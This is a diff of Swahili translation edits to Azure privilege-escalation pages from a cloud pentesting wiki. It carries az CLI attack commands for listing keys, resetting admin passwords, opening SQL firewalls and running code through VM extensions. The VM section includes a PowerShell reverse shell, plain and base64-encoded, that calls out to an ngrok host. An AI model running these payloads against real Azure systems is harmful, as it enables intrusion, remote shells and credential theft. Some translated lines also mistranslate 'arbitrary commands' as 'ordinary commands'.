-Ruhusa hii inaruhusu mshambuliaji kuongeza ujumbe mpya au kuboresha wale waliopo katika Azure Storage Queue. Kwa kutumia hii, wanaweza kuingiza maudhui mabaya au kubadilisha ujumbe waliopo, ambayo yanaweza kupelekea upotoshaji wa programu au kusababisha tabia zisizohitajika katika mifumo inayotegemea foleni.
+Ruhusa hii inaruhusu mshambuliaji kuongeza ujumbe mpya au kuboresha wale waliopo katika Azure Storage Queue. Kwa kutumia hii, wanaweza kuingiza maudhui mabaya au kubadilisha ujumbe waliopo, ambayo yanaweza kuongoza vibaya programu au kusababisha tabia zisizohitajika katika mifumo inayotegemea foleni.
 ```bash
 az storage message put --queue-name  --content "Injected malicious message" --account-name 
 
@@ -46,7 +46,7 @@ az storage message update --queue-name  \
 ```
 ### Action: `Microsoft.Storage/storageAccounts/queueServices/queues/write`
 
-Ruhusa hii inaruhusu mshambuliaji kuunda au kubadilisha foleni na mali zao ndani ya akaunti ya hifadhi. Inaweza kutumika kuunda foleni zisizoidhinishwa, kubadilisha metadata, au kubadilisha orodha za udhibiti wa ufikiaji (ACLs) ili kutoa au kupunguza ufikiaji. Uwezo huu unaweza kuharibu michakato ya kazi, kuingiza data mbaya, kuhamasisha taarifa nyeti, au kubadilisha mipangilio ya foleni ili kuwezesha mashambulizi zaidi.
+Ruhusa hii inaruhusu mshambuliaji kuunda au kubadilisha foleni na mali zao ndani ya akaunti ya hifadhi. Inaweza kutumika kuunda foleni zisizoidhinishwa, kubadilisha metadata, au kubadilisha orodha za udhibiti wa ufikiaji (ACLs) ili kutoa au kupunguza ufikiaji. Uwezo huu unaweza kuharibu michakato, kuingiza data mbaya, kuhamasisha taarifa nyeti, au kubadilisha mipangilio ya foleni ili kuwezesha mashambulizi zaidi.
 ```bash
 az storage queue create --name  --account-name 
 
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md
index 945cfce3e..3b549e181 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md
@@ -12,7 +12,7 @@ Kwa maelezo zaidi angalia:
 
 ### Tuma Ujumbe. Kitendo: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` AU `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action`
 
-Unaweza kupata `PrimaryConnectionString`, ambayo inafanya kazi kama akidi kwa jina la huduma ya Bus. Kwa kutumia hii string ya muunganisho, unaweza kuthibitisha kikamilifu kama jina la huduma ya Bus, na kukuwezesha kutuma ujumbe kwa foleni au mada yoyote na kwa uwezekano kuingiliana na mfumo kwa njia ambazo zinaweza kuharibu shughuli, kujifanya kuwa watumiaji halali, au kuingiza data mbaya katika mchakato wa ujumbe.
+Unaweza kupata `PrimaryConnectionString`, ambayo inafanya kazi kama kitambulisho kwa ajili ya Service Bus namespace. Kwa kutumia uhusiano huu, unaweza kuthibitisha kikamilifu kama Service Bus namespace, na kukuwezesha kutuma ujumbe kwa foleni au mada yoyote na kwa uwezekano kuingiliana na mfumo kwa njia ambazo zinaweza kuharibu shughuli, kujifanya kuwa watumiaji halali, au kuingiza data mbaya katika mchakato wa ujumbe.
 ```python
 #You need to install the following libraries
 #pip install azure-servicebus
@@ -83,7 +83,7 @@ print("----------------------------")
 ```
 ### Pokea Ujumbe. Kitendo: `Microsoft.ServiceBus/namespaces/authorizationRules/listkeys/action` AU `Microsoft.ServiceBus/namespaces/authorizationRules/regenerateKeys/action`
 
-Unaweza kupata PrimaryConnectionString, ambayo inatumika kama akidi kwa ajili ya huduma ya Bus namespace. Kwa kutumia hii connection string, unaweza kupokea ujumbe kutoka kwa foleni yoyote au usajili ndani ya namespace, ikiruhusu ufikiaji wa data ambayo inaweza kuwa nyeti au muhimu, ikiruhusu uhamasishaji wa data, au kuingilia kati katika usindikaji wa ujumbe na michakato ya programu.
+Unaweza kupata PrimaryConnectionString, ambayo inatumika kama akidi kwa ajili ya Service Bus namespace. Kwa kutumia uhusiano huu, unaweza kupokea ujumbe kutoka kwa foleni yoyote au usajili ndani ya namespace, ikiruhusu ufikiaji wa data ambayo inaweza kuwa nyeti au muhimu, ikihamasisha uhamasishaji wa data, au kuingilia kati mchakato wa ujumbe na michakato ya programu.
 ```python
 #You need to install the following libraries
 #pip install azure-servicebus
@@ -129,7 +129,7 @@ print("----------------------------")
 ```
 ### `Microsoft.ServiceBus/namespaces/authorizationRules/write` & `Microsoft.ServiceBus/namespaces/authorizationRules/write`
 
-Ikiwa una ruhusa hizi, unaweza kuongeza mamlaka kwa kusoma au kuunda funguo za ufikiaji wa pamoja. Funguo hizi zinakuwezesha kudhibiti kikamilifu eneo la Service Bus, ikiwa ni pamoja na kusimamia foleni, mada, na kutuma/kupokea ujumbe, huenda ukapita udhibiti wa ufikiaji kulingana na majukumu (RBAC).
+Ikiwa una ruhusa hizi, unaweza kuongeza mamlaka kwa kusoma au kuunda funguo za ufikiaji wa pamoja. Funguo hizi zinakupa udhibiti kamili juu ya namespace ya Service Bus, ikiwa ni pamoja na kusimamia foleni, mada, na kutuma/kupokea ujumbe, ambayo inaweza kupita udhibiti wa ufikiaji wa msingi wa jukumu (RBAC).
 ```bash
 az servicebus namespace authorization-rule update \
 --resource-group  \
@@ -137,7 +137,7 @@ az servicebus namespace authorization-rule update \
 --name RootManageSharedAccessKey \
 --rights Manage Listen Send
 ```
-## References
+## Marejeo
 
 - https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
 - https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
index d0c8988ff..937202de2 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
@@ -12,7 +12,7 @@ Kwa maelezo zaidi kuhusu SQL Database angalia:
 
 ### "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/write"
 
-Kwa ruhusa hizi, mtumiaji anaweza kufanya kupandisha hadhi kwa kuboresha au kuunda Azure SQL servers na kubadilisha mipangilio muhimu, ikiwa ni pamoja na akcredentials za usimamizi. Ruhusa hii inamruhusu mtumiaji kuboresha mali za server, ikiwa ni pamoja na nenosiri la msimamizi wa SQL server, ikiruhusu ufikiaji usioidhinishwa au udhibiti wa server. Wanaweza pia kuunda servers mpya, huenda wakileta miundombinu ya kivuli kwa madhumuni mabaya. Hii inakuwa muhimu hasa katika mazingira ambapo "Microsoft Entra Authentication Only" imezimwa, kwani wanaweza kutumia uthibitishaji wa SQL kupata ufikiaji usio na kikomo.
+Kwa ruhusa hizi, mtumiaji anaweza kufanya kupandisha hadhi kwa kuboresha au kuunda Azure SQL servers na kubadilisha mipangilio muhimu, ikiwa ni pamoja na akcredentials za usimamizi. Ruhusa hii inamruhusu mtumiaji kuboresha mali za server, ikiwa ni pamoja na nenosiri la msimamizi wa SQL server, na kuwezesha ufikiaji usioidhinishwa au udhibiti wa server. Wanaweza pia kuunda servers mpya, ambayo inaweza kuanzisha miundombinu ya kivuli kwa madhumuni mabaya. Hii inakuwa muhimu hasa katika mazingira ambapo "Microsoft Entra Authentication Only" imezimwa, kwani wanaweza kutumia uthibitishaji wa SQL kupata ufikiaji usio na kikomo.
 ```bash
 # Change the server password
 az sql server update \
@@ -28,7 +28,7 @@ az sql server create \
 --admin-user  \
 --admin-password 
 ```
-Vilevile, ni muhimu kuwa na ufikiaji wa umma umewezeshwa ikiwa unataka kufikia kutoka kwa kiunganishi kisichokuwa cha kibinafsi, ili kuuwezesha:
+Zaidi ya hayo, ni muhimu kuwa na ufikiaji wa umma ulioanzishwa ikiwa unataka kufikia kutoka kwa kiunganishi kisichokuwa cha kibinafsi, ili kuuwezesha:
 ```bash
 az sql server update \
 --name  \
@@ -37,7 +37,7 @@ az sql server update \
 ```
 ### "Microsoft.Sql/servers/firewallRules/write"
 
-Mshambuliaji anaweza kubadilisha sheria za firewall kwenye Azure SQL servers ili kuruhusu ufikiaji usioidhinishwa. Hii inaweza kutumika kufungua server kwa anwani maalum za IP au anuwai nzima za IP, ikiwa ni pamoja na IP za umma, na kuruhusu ufikiaji kwa wahusika wabaya. Shughuli hii ya baada ya unyakuzi inaweza kutumika kupita udhibiti wa usalama wa mtandao uliopo, kuanzisha kudumu, au kuwezesha harakati za upande ndani ya mazingira kwa kufichua rasilimali nyeti.
+Mshambuliaji anaweza kubadilisha sheria za firewall kwenye Azure SQL servers ili kuruhusu ufikiaji usioidhinishwa. Hii inaweza kutumika kufungua server kwa anwani maalum za IP au anuwai nzima za IP, ikiwa ni pamoja na IP za umma, ikiruhusu ufikiaji kwa wahalifu. Shughuli hii ya baada ya unyakuzi inaweza kutumika kupita udhibiti wa usalama wa mtandao uliopo, kuanzisha kudumu, au kuwezesha harakati za upande ndani ya mazingira kwa kufichua rasilimali nyeti.
 ```bash
 # Create Firewall Rule
 az sql server firewall-rule create \
@@ -55,8 +55,8 @@ az sql server firewall-rule update \
 --start-ip-address  \
 --end-ip-address 
 ```
-Additionally, `Microsoft.Sql/servers/outboundFirewallRules/delete` ruhusa inakuwezesha kufuta Sheria ya Firewall.  
-NOTE: Ni muhimu kuwa na ufikiaji wa umma ulioanzishwa
+Zaidi ya hayo, ruhusa ya `Microsoft.Sql/servers/outboundFirewallRules/delete` inakuwezesha kufuta Sheria ya Firewall.  
+KUMBUKA: Ni muhimu kuwa na ufikiaji wa umma ulioanzishwa
 
 ### ""Microsoft.Sql/servers/ipv6FirewallRules/write"
 
@@ -69,12 +69,12 @@ az sql server firewall-rule create \
 --start-ip-address  \
 --end-ip-address 
 ```
-Additionally, `Microsoft.Sql/servers/ipv6FirewallRules/delete` ruhusa inakuwezesha kufuta Sheria ya Firewall.  
-NOTE: Ni muhimu kuwa na ufikiaji wa umma ulioanzishwa
+Zaidi ya hayo, ruhusa ya `Microsoft.Sql/servers/ipv6FirewallRules/delete` inakuwezesha kufuta Kanuni ya Firewall.  
+KUMBUKA: Ni muhimu kuwa na ufikiaji wa umma ulioanzishwa
 
 ### "Microsoft.Sql/servers/administrators/write" && "Microsoft.Sql/servers/administrators/read"
 
-Kwa ruhusa hizi unaweza privesc katika mazingira ya Azure SQL Server kwa kufikia hifadhidata za SQL na kupata taarifa muhimu. Kwa kutumia amri iliyo hapa chini, mshambuliaji au mtumiaji aliyeidhinishwa anaweza kujipatia au kuweka akaunti nyingine kama msimamizi wa Azure AD. Ikiwa "Microsoft Entra Authentication Only" imeanzishwa unaweza kufikia seva na matukio yake. Hapa kuna amri ya kuweka msimamizi wa Azure AD kwa seva ya SQL:
+Kwa ruhusa hizi unaweza privesc katika mazingira ya Azure SQL Server kwa kufikia hifadhidata za SQL na kupata taarifa muhimu. Kwa kutumia amri iliyo hapa chini, mshambuliaji au mtumiaji aliyeidhinishwa anaweza kujipatia au kuweka akaunti nyingine kama msimamizi wa Azure AD. Ikiwa "Microsoft Entra Authentication Only" imeanzishwa unaweza kufikia seva na mifano yake. Hapa kuna amri ya kuweka msimamizi wa Azure AD kwa seva ya SQL:
 ```bash
 az sql server ad-admin create \
 --server  \
@@ -84,7 +84,7 @@ az sql server ad-admin create \
 ```
 ### "Microsoft.Sql/servers/azureADOnlyAuthentications/write" && "Microsoft.Sql/servers/azureADOnlyAuthentications/read"
 
-Kwa ruhusa hizi, unaweza kuunda na kutekeleza "Microsoft Entra Authentication Only" kwenye Azure SQL Server, ambayo inaweza kuwezesha kupanda hadhi katika hali fulani. Mshambuliaji au mtumiaji aliyeidhinishwa mwenye ruhusa hizi anaweza kuwezesha au kuzima uthibitishaji wa Azure AD pekee.
+Kwa ruhusa hizi, unaweza kuunda na kutekeleza "Microsoft Entra Authentication Only" kwenye Azure SQL Server, ambayo inaweza kusaidia kupandisha hadhi katika hali fulani. Mshambuliaji au mtumiaji aliyeidhinishwa mwenye ruhusa hizi anaweza kuwezesha au kuzima uthibitishaji wa Azure AD pekee.
 ```bash
 #Enable
 az sql server azure-ad-only-auth enable \
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
index 87bd5c267..c92c9a70b 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
@@ -4,7 +4,7 @@
 
 ## Storage Privesc
 
-Kwa maelezo zaidi kuhusu hifadhi angalia:
+Kwa maelezo zaidi kuhusu uhifadhi angalia:
 
 {{#ref}}
 ../az-services/az-storage.md
@@ -12,7 +12,7 @@ Kwa maelezo zaidi kuhusu hifadhi angalia:
 
 ### Microsoft.Storage/storageAccounts/listkeys/action
 
-Mtu mwenye ruhusa hii ataweza kuorodhesha (na thamani za siri) za **funguo za ufikiaji** za akaunti za hifadhi. Hii inaruhusu mtu huyo kupandisha hadhi yake juu ya akaunti za hifadhi.
+Mtu mwenye ruhusa hii ataweza kuorodhesha (na thamani za siri) za **funguo za ufikiaji** za akaunti za uhifadhi. Hii inaruhusu mtu huyo kupandisha hadhi yake juu ya akaunti za uhifadhi.
 ```bash
 az storage account keys list --account-name 
 ```
@@ -20,7 +20,7 @@ az storage account keys list --account-name 
 
 Mtu mwenye ruhusa hii ataweza kufufua na kupata thamani mpya ya siri ya **funguo za ufikiaji** za akaunti za hifadhi. Hii inaruhusu mtu huyo kuongeza mamlaka yake juu ya akaunti za hifadhi.
 
-Zaidi ya hayo, katika jibu, mtumiaji atapata thamani ya funguo iliyofufuliwa na pia ya ile isiyofufuliwa:
+Zaidi ya hayo, katika jibu, mtumiaji atapata thamani ya funguo zilizofufuliwa na pia ya zile zisizofufuliwa:
 ```bash
 az storage account keys renew --account-name  --key key2
 ```
@@ -38,10 +38,10 @@ az storage account update --name  --add networkRuleSet.ipRules value=<
 
 ### Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/write | Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/delete
 
-Ruhusa ya kwanza inaruhusu **kubadilisha sera za kutoweza kubadilishwa** katika kontena na ya pili kufuta hizo.
+Ruhusa ya kwanza inaruhusu **kubadilisha sera za kutokuweza kubadilishwa** katika kontena na ya pili inaruhusu kuzifuta.
 
 > [!NOTE]
-> Kumbuka kwamba ikiwa sera ya kutoweza kubadilishwa iko katika hali ya kufungwa, huwezi kufanya mojawapo ya hizo mbili.
+> Kumbuka kwamba ikiwa sera ya kutokuweza kubadilishwa iko katika hali ya kufungwa, huwezi kufanya mojawapo ya hizo mbili.
 ```bash
 az storage container immutability-policy delete \
 --account-name  \
@@ -58,11 +58,11 @@ az storage container immutability-policy update \
 
 ### Microsoft.Storage/storageAccounts/fileServices/takeOwnership/action
 
-Hii inapaswa kumruhusu mtumiaji mwenye ruhusa hii kuwa na uwezo wa kuchukua umiliki wa faili ndani ya mfumo wa faili ulio shiriki.
+Hii inapaswa kumruhusu mtumiaji mwenye ruhusa hii kuwa na uwezo wa kuchukua umiliki wa faili ndani ya mfumo wa faili wa pamoja.
 
 ### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/modifypermissions/action
 
-Hii inapaswa kumruhusu mtumiaji mwenye ruhusa hii kuwa na uwezo wa kubadilisha ruhusa za faili ndani ya mfumo wa faili ulio shiriki.
+Hii inapaswa kumruhusu mtumiaji mwenye ruhusa hii kuwa na uwezo wa kubadilisha ruhusa za faili ndani ya mfumo wa faili wa pamoja.
 
 ### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/actassuperuser/action
 
@@ -70,7 +70,7 @@ Hii inapaswa kumruhusu mtumiaji mwenye ruhusa hii kuwa na uwezo wa kufanya viten
 
 ### Microsoft.Storage/storageAccounts/localusers/write (Microsoft.Storage/storageAccounts/localusers/read)
 
-Kwa ruhusa hii, mshambuliaji anaweza kuunda na kusasisha (ikiwa ana ruhusa ya `Microsoft.Storage/storageAccounts/localusers/read`) mtumiaji mpya wa ndani kwa akaunti ya Azure Storage (iliyowekwa na namespace ya kihierarkia), ikiwa ni pamoja na kuweka ruhusa za mtumiaji na saraka ya nyumbani. Ruhusa hii ni muhimu kwa sababu inamruhusu mshambuliaji kujipa ruhusa kwa akaunti ya hifadhi yenye ruhusa maalum kama kusoma (r), kuandika (w), kufuta (d), na orodha (l) na zaidi. Zaidi ya hayo, mbinu za uthibitishaji zinazotumika zinaweza kuwa nywila zinazozalishwa na Azure na funguo za SSH. Hakuna ukaguzi ikiwa mtumiaji tayari yupo, hivyo unaweza kufuta watumiaji wengine ambao tayari wapo. Mshambuliaji anaweza kuongeza haki zao na kupata ufikiaji wa SSH kwa akaunti ya hifadhi, ambayo inaweza kufichua au kuhatarisha data nyeti.
+Kwa ruhusa hii, mshambuliaji anaweza kuunda na kusasisha (ikiwa ana ruhusa ya `Microsoft.Storage/storageAccounts/localusers/read`) mtumiaji mpya wa ndani kwa akaunti ya Azure Storage (iliyowekwa na namespace ya kihierarkia), ikiwa ni pamoja na kuweka ruhusa za mtumiaji na saraka ya nyumbani. Ruhusa hii ni muhimu kwa sababu inamruhusu mshambuliaji kujipa ruhusa kwa akaunti ya hifadhi yenye ruhusa maalum kama kusoma (r), kuandika (w), kufuta (d), na orodha (l) na zaidi. Zaidi ya hayo, mbinu za uthibitishaji zinazotumika zinaweza kuwa nywila zinazozalishwa na Azure na funguo za SSH. Hakuna ukaguzi ikiwa mtumiaji tayari yupo, hivyo unaweza kufuta watumiaji wengine ambao tayari wapo. Mshambuliaji anaweza kuongeza mamlaka yao na kupata ufikiaji wa SSH kwa akaunti ya hifadhi, ambayo inaweza kufichua au kuhatarisha data nyeti.
 ```bash
 az storage account local-user create \
 --account-name  \
@@ -82,7 +82,7 @@ az storage account local-user create \
 ```
 ### Microsoft.Storage/storageAccounts/localusers/regeneratePassword/action
 
-Kwa ruhusa hii, mshambuliaji anaweza kuunda upya nenosiri la mtumiaji wa ndani katika akaunti ya Azure Storage. Hii inampa mshambuliaji uwezo wa kupata akreditivu mpya za uthibitishaji (kama vile nenosiri la SSH au SFTP) kwa mtumiaji. Kwa kutumia akreditivu hizi, mshambuliaji anaweza kupata ufikiaji usioidhinishwa kwenye akaunti ya hifadhi, kufanya uhamishaji wa faili, au kubadilisha data ndani ya vyombo vya hifadhi. Hii inaweza kusababisha kuvuja kwa data, uharibifu, au mabadiliko mabaya ya maudhui ya akaunti ya hifadhi.
+Kwa ruhusa hii, mshambuliaji anaweza kuunda upya nenosiri la mtumiaji wa ndani katika akaunti ya Azure Storage. Hii inampa mshambuliaji uwezo wa kupata akreditif mpya za uthibitishaji (kama vile nenosiri la SSH au SFTP) kwa mtumiaji. Kwa kutumia akreditif hizi, mshambuliaji anaweza kupata ufikiaji usioidhinishwa kwenye akaunti ya hifadhi, kufanya uhamishaji wa faili, au kubadilisha data ndani ya kontena za hifadhi. Hii inaweza kusababisha uvujaji wa data, uharibifu, au mabadiliko mabaya ya maudhui ya akaunti ya hifadhi.
 ```bash
 az storage account local-user regenerate-password \
 --account-name  \
@@ -96,7 +96,7 @@ sftp @.blob.core.windows.net
 ```
 ### Microsoft.Storage/storageAccounts/restoreBlobRanges/action, Microsoft.Storage/storageAccounts/blobServices/containers/read, Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action
 
-Kwa ruhusa hizi, mshambuliaji anaweza kurejesha kontena lililofutwa kwa kubainisha kitambulisho cha toleo lake lililofutwa au kufuta tena blobs maalum ndani ya kontena, ikiwa zilikuwa zimefutwa kwa njia ya laini awali. Kuinua kwa ruhusa hii kunaweza kumwezesha mshambuliaji kurejesha data nyeti ambayo ilikusudiwa kufutwa kabisa, ambayo inaweza kusababisha ufikiaji usioidhinishwa.
+Kwa ruhusa hizi, mshambuliaji anaweza kurejesha kontena lililofutwa kwa kubainisha kitambulisho cha toleo lake lililofutwa au kuondoa blobs maalum ndani ya kontena, ikiwa zilikuwa zimefutwa kwa njia ya laini awali. Kuinuka kwa ruhusa hii kunaweza kumwezesha mshambuliaji kurejesha data nyeti ambayo ilikusudiwa kufutwa kabisa, na hivyo kusababisha ufikiaji usioidhinishwa.
 ```bash
 #Restore the soft deleted container
 az storage container restore \
@@ -112,21 +112,21 @@ az storage blob undelete \
 ```
 ### Microsoft.Storage/storageAccounts/fileServices/shares/restore/action && Microsoft.Storage/storageAccounts/read
 
-Kwa ruhusa hizi, mshambuliaji anaweza kurejesha sehemu ya faili ya Azure iliyofutwa kwa kubainisha kitambulisho cha toleo lake lililofutwa. Kuinua ruhusa hii kunaweza kumwezesha mshambuliaji kurejesha data nyeti ambayo ilikusudiwa kufutwa kabisa, ambayo inaweza kusababisha ufikiaji usioidhinishwa.
+Kwa ruhusa hizi, mshambuliaji anaweza kurejesha sehemu ya faili ya Azure iliyofutwa kwa kubainisha kitambulisho chake cha toleo lililofutwa. Kuinua ruhusa hii kunaweza kumwezesha mshambuliaji kurejesha data nyeti ambayo ilikusudiwa kufutwa kabisa, ambayo inaweza kusababisha ufikiaji usioidhinishwa.
 ```bash
 az storage share-rm restore \
 --storage-account  \
 --name  \
 --deleted-version 
 ```
-## Other interesting looking permissions (TODO)
+## Mamlaka mengine ya kuvutia (TODO)
 
-- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Inabadilisha umiliki wa blob
-- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Inabadilisha ruhusa za blob
+- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Hubadilisha umiliki wa blob
+- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Hubadilisha mamlaka ya blob
 - Microsoft.Storage/storageAccounts/blobServices/containers/blobs/runAsSuperUser/action: Inarudisha matokeo ya amri ya blob
 - Microsoft.Storage/storageAccounts/blobServices/containers/blobs/immutableStorage/runAsSuperUser/action
 
-## References
+## Marejeo
 
 - [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage)
 - [https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support)
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
index 7a78a1f75..3f1390426 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
@@ -13,7 +13,7 @@ Kwa maelezo zaidi kuhusu Azure Virtual Machines na Network angalia:
 ### **`Microsoft.Compute/virtualMachines/extensions/write`**
 
 Ruhusa hii inaruhusu kutekeleza nyongeza katika mashine za virtual ambazo zinaruhusu **kutekeleza msimbo wowote juu yao**.\
-Mfano wa kutumia nyongeza za kawaida kutekeleza amri zisizo za kawaida katika VM:
+Mfano wa kutumia nyongeza za kawaida kutekeleza amri za kawaida katika VM:
 
 {{#tabs }}
 {{#tab name="Linux" }}
@@ -49,7 +49,7 @@ az vm extension set \
 
 {{#tab name="Windows" }}
 
-- Tekeleza shell ya kinyume
+- Tekeleza shell ya kurudi
 ```bash
 # Get encoded reverse shell
 echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
@@ -65,7 +65,7 @@ az vm extension set \
 --protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}'
 
 ```
-- Tekeleza shell ya kinyume kutoka kwa faili
+- Tekeleza shell ya kurudi kutoka kwa faili
 ```bash
 az vm extension set \
 --resource-group  \
@@ -93,7 +93,7 @@ Pia inawezekana kutumia nyongeza zinazojulikana vizuri kutekeleza msimbo au kufa
 
 VMAccess extension
 
-Nyongeza hii inaruhusu kubadilisha nenosiri (au kuunda ikiwa halipo) la watumiaji ndani ya VMs za Windows.
+Nyongeza hii inaruhusu kubadilisha nenosiri (au kuunda ikiwa halipo) la watumiaji ndani ya Windows VMs.
 ```powershell
 # Run VMAccess extension to reset the password
 $cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
@@ -105,7 +105,7 @@ Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Na
 
 DesiredConfigurationState (DSC)
 
-Hii ni **VM extensio**n inayomilikiwa na Microsoft inayotumia PowerShell DSC kusimamia usanidi wa Azure Windows VMs. Hivyo, inaweza kutumika **kutekeleza amri zisizo na mipaka** katika Windows VMs kupitia nyongeza hii:
+Hii ni **VM extensio**n inayomilikiwa na Microsoft inayotumia PowerShell DSC kusimamia usanidi wa Azure Windows VMs. Hivyo, inaweza kutumika **kutekeleza amri za kawaida** katika Windows VMs kupitia nyongeza hii:
 ```powershell
 # Content of revShell.ps1
 Configuration RevShellConfig {
@@ -251,7 +251,7 @@ az vm application set \
 
 ### `Microsoft.Compute/virtualMachines/runCommand/action`
 
-Hii ndiyo njia ya msingi zaidi ambayo Azure inatoa ili **kutekeleza amri zisizo na mpangilio katika VMs:**
+Hii ndiyo njia ya msingi zaidi ambayo Azure inatoa ili **kutekeleza amri za kawaida katika VMs:**
 
 {{#tabs }}
 {{#tab name="Linux" }}
@@ -327,7 +327,7 @@ az vm create \
 ```
 ### `Microsoft.Compute/virtualMachines/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
 
-Ruhusa hizo zinatosha **kuteua utambulisho mpya wa usimamizi kwa VM**. Kumbuka kwamba VM inaweza kuwa na utambulisho kadhaa wa usimamizi. Inaweza kuwa na **ule wa mfumo**, na **utambulisho mwingi wa usimamizi wa mtumiaji**.\
+Ruhusa hizo zinatosha **kuteua utambulisho mpya wa usimamizi kwa VM**. Kumbuka kwamba VM inaweza kuwa na utambulisho kadhaa wa usimamizi. Inaweza kuwa na **ule wa mfumo** na **utambulisho mwingi wa usimamizi wa mtumiaji**.\
 Kisha, kutoka kwa huduma ya metadata inawezekana kuzalisha tokeni kwa kila mmoja.
 ```bash
 # Get currently assigned managed identities to the VM
@@ -343,7 +343,7 @@ az vm identity assign \
 /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \
